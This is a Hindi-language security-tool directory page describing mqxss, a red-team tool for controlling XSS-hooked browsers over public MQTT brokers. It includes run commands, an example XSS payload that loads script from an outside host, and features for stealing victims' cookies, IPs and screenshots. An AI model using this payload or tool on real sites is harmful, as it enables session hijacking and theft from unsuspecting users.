Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
mqxss — MQTT के माध्यम से हुक्ड ब्राउज़र संचार | Kitploit
उपकरण/GitHubGitHub/grampae/mqxss
पेलोड जनरेशनवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
GitHubgrampae/mqxss

mqxss

MQTT के माध्यम से हुक्ड ब्राउज़र संचार

रिपॉजिटरी देखें
832 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

mqxss v0.2

mqxss हुक किए गए ब्राउज़रों से MQTT पर संवाद करने के लिए एक क्लाइंट के रूप में कार्य करता है

Screenshot from 2023-07-03 15-15-35

beef या xsshunter की तुलना में इसका उपयोग करने का लाभ यह है कि js payload होस्ट करने के अलावा कोई infra सेटअप नहीं है, आप एक public broker उपयोग कर सकते हैं (हालाँकि वर्तमान में यह obfuscation का उपयोग करता है, encryption काम में है)।

हुक किए गए ब्राउज़र आपके द्वारा निर्दिष्ट broker पर MQTT topic में संवाद करेंगे, इसके साथ परीक्षण करने के लिए कई public/free brokers उपलब्ध हैं।

क्लाइंट python paho.mqtt लाइब्रेरी का उपयोग करता है जबकि js payload 'mqttws31.min.js' का उपयोग करता है जिसे वह यहाँ से लेता है 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'।


निर्देश

Screenshot from 2024-01-17 11-34-59

ब्राउज़रों को हुक करने के लिए JS payload जनरेट करने हेतु runtime पर -g फ्लैग को अपने broker, port और topic वेरिएबल्स के साथ सेट करें। ऐसा करने पर आपका payload /js/ फ़ोल्डर में बन जाएगा।

क्लाइंट चलाने के लिए अपना broker, port और topic इस प्रकार प्रदान करें:

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

क्रेडेंशियल्स के साथ क्लाइंट चलाने के लिए अपना broker, port, user name, password और topic इस प्रकार प्रदान करें:

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

अपना XSS payload पीड़ित को भेजें जबकि mqxss क्लाइंट चल रहा हो, उदा: '"><script src=https://example.com/x.js async></script> या ऐसा ही कुछ, यदि vulnerable है तो आपको एक सूचना मिलनी चाहिए जिसमें बताया गया हो कि ब्राउज़र कनेक्ट हो गया है और कुकीज़ आदि सहित कुछ बुनियादी विवरण मौजूद हैं।

a


विशेषताएँ:

  • js payload MQTT QoS 1 और Last Will का उपयोग करता है, क्लाइंट के broker से कनेक्ट न होने पर होने वाले disconnects या connects के बारे में mqxss को सूचित किया जाएगा
  • ब्राउज़रों को हुक करने के लिए runtime पर js payload जनरेट करें
  • वर्तमान में केवल उन mqtt brokers के साथ काम करता है जो secure websockets का उपयोग करते हैं
  • सुविधा के लिए कैप्चर की गई कुकीज़ के साथ हुक किए गए ब्राउज़र का स्थान ब्राउज़र में खोलें
  • हुक होने पर यह cookies, ip, device type, user agent पकड़ लेता है
  • पिछले हुक किए गए (अनहुक किए गए) ब्राउज़रों को देखें
  • वर्तमान में हुक किए गए ब्राउज़रों में js भेजें और उपलब्ध होने पर प्रतिक्रिया प्राप्त करें
  • हुक किए गए ब्राउज़र का स्क्रीनशॉट
  • runtime पर user, password उन brokers के लिए सेट करें जिन्हें इसकी आवश्यकता होती है
  • mqxss.py में ptoken और userkey वेरिएबल्स सेट करके pushover सूचना प्राप्त करें, फिर -po कमांड लाइन फ्लैग का उपयोग करें
टूल डाउनलोड करें